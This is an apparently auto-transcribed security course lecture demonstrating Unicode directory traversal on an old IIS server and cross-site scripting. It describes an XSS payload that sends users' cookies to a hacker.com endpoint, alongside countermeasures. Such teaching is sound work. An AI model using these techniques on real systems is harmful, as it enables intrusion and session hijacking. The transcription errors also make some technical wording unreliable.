6. Directory Traversal & Other Common Vulnerabilties
Now, the next thing we want to talk about are some of the common attacks. The first thing I want to start with is something called directory traversal. I’m going to demonstrate this with an older version of iis because I know it, it happens to be vulnerable to this. Now, a directory traversal, sometimes called a path traversal, consists of exploiting insufficient security validation, slash sanitation of user supplied input files so that characters representing traverse to parent directory are passed through to the file apis. Now, the goal of this attack is to order an application to access a computer file that’s not really intended to be accessible to that user. This attack exploits a lack of security.
Now, the software is actually acting correctly as opposed to exploiting a bug that’s in the code. So this is generally problems that we have either with the Web server not allowing access to this because of problems with an access control list, or some people may even blame the developer for not filtering these types of things out. In my particular opinion, both of these should be done direct reversal is also known as the forward slash. In other words, attack directory climbing backtracking. Some forms of attack are also known as concatenation attacks as well. So the thing that I want you to understand is that so let’s go ahead and take a look at a demo that I’ve got set up for you to do this.
Now, what I’m going to do is I’m going to actually get access to this older version of Windows, but I’m going to do it through Internet Explorer. Now, when Internet Explorer first came out with this, it didn’t filter out the things it was supposed to filter out. So what I’m going to attempt to do is run the who am I? Command. As you can see right here, the who am I? Command is located my Internet exploder Explorer press Control V. And I want you to notice right here that this is going to attempt to attach to 1041 156, which is my Windows 2000 server. It’s going to go into forward slash scripts, and then it does some kind of gibberish that I’m going to explain just a couple of moments.
And then finally arriving at the who am I? Command. If all goes well here, it’s going to give me this particular screen. It’s saying that the who am I? Command is running under the permission of I user underscore nxt. And then this particular number right here. Now, what actually is happening here? I’m going to explain that in just a couple of moments, but I’m first going to run a couple of other commands rather than who am I? Maybe I’m going to run the arp command and I’m going to pass to it a now, remember, in order for us to display the arp cache, it would have had to speak to these particular individuals within the last two minutes or it would say no entries found.
Now in this particular case, I’m almost willing to bet that my machine that I’m doing this from, the xp machine is one and 152 because it would have had to arp and then come back. And that’s why it’s in this particular table. I’m able to determine which is probably the firewall or perhaps the application or even perhaps which one is the sql Server because naturally the Web Server is going to be talking to one of those. Let’s say I would like to do an ipconfig execall. Now in most cases, your Web Server that’s sitting on the Internet is going to have two cards. One of them is going to be used to service the Internet. The other card is going to be used for its back end services, for example, access to the firewall and on through to the sql Server.
So I would like to be able to find out what that is. If I click on Go right here, it’s going to give me all of the information as if I typed IP config right there onto the command line. So if you’ve already surmised what I’m doing is I’m running commands off of that Web Server, you’re absolutely right. Let’s go ahead and do a couple more commands here. I’ll explain this in more detail. I’m going to let’s try doing the Netstat command. All right, these are the various ports that are open or the ones that are listening on this particular machine. And the one maybe that I’ve attached to, I can tell you right now, there’s not an ids in the world that’s going to pick this up.
What I’ve done is I basically asked the Web Server itself to tell me what’s attached to it, what ports it has opened without using anything like N map or port scanning software that might be picked up. And it just simply gives me back that list. So I’m running commands off of this server. Okay, Tim, how did you do this? Well, let’s go ahead and look at this in a little bit more detail. If I look in a little more detail, you can see I’ve got some of these commands that looks a little funky, it looks a little bit strange. What this is, is a mechanism for me to dot dot. In other words, move up a directory.
So I’m telling it to do move up a directory, move up a directory, move up a directory in a language that we happen to have not filtered out. Now the way I understand it, this language happens to be farsi. So it would have printed the arabic characters if I would have had that language pack installed when they built this version of Internet exploder. It didn’t happen to filter out that particular language or that unicode value, which is what it’s typically referred to. So what I’m actually doing is I’m running the commands off of my Windows 2000 server at the system directory. You may have heard some people tell you you should always install Is with a system drive and then another drive, like for example, the D drive.
Then you should put your iis on that D drive. So the system drive, the ones where we have commands like netstat and command and things that we wouldn’t necessarily want individuals to have access to, are not able to be navigated to even if somebody does drop the ball. And that’s the reason they tell you to do something like this. Let’s try one more command here. Okay, so I went ahead and typed that in and you can see what I’m trying to do is I’m trying to run an instance of the command console and then forward slash c tells it to run any commands that may be internal to cmd. And dir is one of those commands. And so it should give me and return a directory of my C drive.
This gives me the directory of my lab folders. If I want to navigate a little bit further down into this, I could, let’s say, go into pw dump two. This is the pw dump folder. I could basically go completely throughout the entire directory structure looking for something or even putting something up there by using a tftp server like we did in the sql lab as well. So I can upload files, download files, and that is if and only if I have the permission to be able to do so with that user that was displayed with the who am I command. So I’m not running as an administrator here. I’m running under the permission set of whatever the Web server is running as.
Now, this is one of the big reasons we don’t run our web servers as administrator, because if we ran it as administrator, naturally we would be able to create users, do whatever we wanted to do here. And that’s not something that we’re necessarily going to want to have happen. So a couple of other things here. The ascii characters for dots are replaced by hexadecimal equivalent, in other words, percent. To e the ascii characters, the slash are replaced with the unicode equivalent of this. So there are different unicode equivalents for all of this. And overlong are not necessarily malformed, but not allowed by a correct unicode encoder or decoder.
It’s used to maliciously bypass that. Now, here’s the problem we’re going to run into, just to give you an example, using unicode and some of the other techniques that are available in web. Here are 70 different ways to encode the less than sign, which is used as the opening to a lot of tags that are in html. So here is the way we might look for it when we’re trying to filter it out, but we would have to go through every one of these 70 ones in order to filter it out correctly. If we drop the ball on any one of these then? No. Okay, well, we’re going to run into problems. So you can see that unless we write our filtering mechanisms correctly, we’re going to run into problems.
7. XSS Demo and Countermeasures
Now you actually may remember this from our SQL injection. And I happen to know this particular application also has some vulnerabilities for cross site scripting. So I’m going to use it to demonstrate this. Now what I’m going to do is I’m going to click on the Professional ASP where it’s going to have me write a review in the right review box. I’m going to type in this right here. So I’m going to grab this right here. I’m going to come over here. I have to click on professional ASP. Then I want to click on Writer Review. And in here I’m going to paste in that thing that I copied. Now I’m going to click on Submit right here and it says the page at such and such says Xss.
This is how a lot of pen testers will prove to you that, hey, you’ve got cross site scripting on your site. Now people that don’t really think it’s that big of a deal will say, well, click okay or close the X right there. They don’t really get the concept of the things that can be done with cross site scripting. So let me see if I can go into a little bit more detail here. One of the most popular ways that cross site scripting attacks you is to try and steal your cookies. So what actually is going on here when we go to a web page? More than likely something that’s shown up in our browser based email, if we click on something that’s dubious and it runs this script. Now let’s take a look at the script.
The script says script, document location. So the document location of this particular area, www dot, hacker, CGI bin, cookie, CGI, send it document cookie. In other words, send Hacker. com. And I’m going to hit put in the question mark. So I’m sending it a URL and the URL parameter is document cookie. I’m sending it my cookie. It’s going to be sending this hacker my cookie when I probably didn’t expect them to do that. Okay, big deal, Tim, they’ve got my cookie. Well, it is a big deal, especially if it is in your email, because email is, because email uses cookies to authenticate you. Have you ever gone in to your email and send an email to somebody and then close the browse? Oh, I needed to do this too.
You went back in, oh, I’m still logged in. How about that? That’s the cookie that’s doing that. If somebody else had your cookie, then guess what, they would be authenticated to your email. If you’ve ever received an email from someone that maybe, I’m going to use an example, my grandmother. And my grandmother says, I’m in this Florida prison priest, send me via PayPal this money so I can get out. I was like, grandma, I know you wouldn’t be in some prison. If you’ve ever seen an email that was just totally off the wall, then that’s probably somebody who has clicked something in their email.
The hacker has gone into their email, used their address book, and tried to send out something called a phishing attack, which hopefully somebody will send them some money to do something. I venture to say most people have actually encountered this. So let’s go a little bit further right here. What actually happens is, if we start at the basics, how does a browser itself different from, let’s say, command exe? Well, both of them can modify and access files. As we’ve seen, they both can execute programs. So gosh, that’s kind of the same, isn’t it? We’re basically saying, here, drive my box. Surfing the web is like giving every website you go to a shell on your box.
Whoa, things just got real now, didn’t they? Going further, here’s a reality check. What actually is happening. Your browser just starts at the top of the page and reads whatever HTML code until it gets to the bottom. A web browser interprets your HTML document as being one great big long line. So what’s happening? Your browser doesn’t know a particular line of code originated from the site or a user that may have injected it. It doesn’t know if the code is good or bad. It starts at the top and reads to the bottom. Now there are two main types of cross site scripting. What I like to refer to as reflected. Most people will call it non persistent.
This is where you would write to something and have it reflected back to you. It’s executed. You saw this just a few seconds ago when we demonstrated this in that bookstore page. Another one is called persistent or stored. It’s what I like to refer to it as. It lays and wait for an unwitting victim to click on something or go to a page and then search code into its HTML page. And then it’s executed. The one example that I like to use when I wrote my book, I used as an example. I used as an example. You could put in a Craigslist ad, and in that Craigslist ad you put in, I and my wife were going through a divorce. I hold the title to her current year Lexus 1st. $1,000 gets it.
I can tell you right now, a lot of people are going to click on that. If in that Craigslist ad I put in something nefarious like this, it would execute and it would send over the cookie to Craigslist. Now, maybe that’s not going to be that big of a deal, but you get the example right here. So you have to think about where can I write to on the Web? A search box, a blog, a form guest book, contact us, form feedback, form chat, or instant messenger? If what you could write can be rendered by a browser as being executable, then cross site scripting can happen to you. Here a script, there a script, here’s a good script, a bad script. It’s inserted from a site with user contributed content. The browser doesn’t know whether it’s good or bad.
It starts at the top, runs the code until it gets to the end of the page. It doesn’t know any different. Now, the generic code of cross site scripting, as I said before, is where can I write? The attacker will usually capture your user ID or session ID. Or your cookie, send the session ID to another server, in other words, cross site. Then use that stolen session ID to log in to the website as if they were you. So if what you could write can be rendered by a browser is executable, cross site scripting is a lot more dangerous than the guy that just told me to click okay, I’ll click the X there. Whenever I do a pen test, I’ll often do it for a contract of, say, over five years. The first year, I identify these cross site scripting.
Now the ones with SQL injection, boy, howdy they fix those real quick. The next year when I come back, they’ve still got the cross site scripting in there. I’ll typically do a demonstration for them and show them the bad things that can happen with cross site scripting. And they really do want to fix this as well. Now, real quickly, let’s talk about a couple of countermeasures here. First, and the most effective solution is to disable all the scripting language support in your browser and email reader. Well, okay, now, if it was maybe 15 years ago, that might work. But most modern web browsers, they really use a lot of script. If that was an option, I could use a utility called no Script.
And it gives you the capability of disabling scripts based upon websites that you know or trust. So any websites that you went to that you didn’t know, maybe you want to have that particular website not executed, any scripts. It’s a really good little utility to use, especially if you’re doing things like I am when I’m going out to maybe some of the dark net sites. And I really don’t know these people at all. They don’t have a real good track record for being ethical, if that is not a possibility. Another recommendation is to use reasonable caution with clicking links and anonymous emails, dubious web pages. Use proxy servers that can help filter out malicious scripting in HTML, or perhaps run your browsing in a container or a sandbox, such as Sandboxy, or even run the browser itself inside a virtual machine.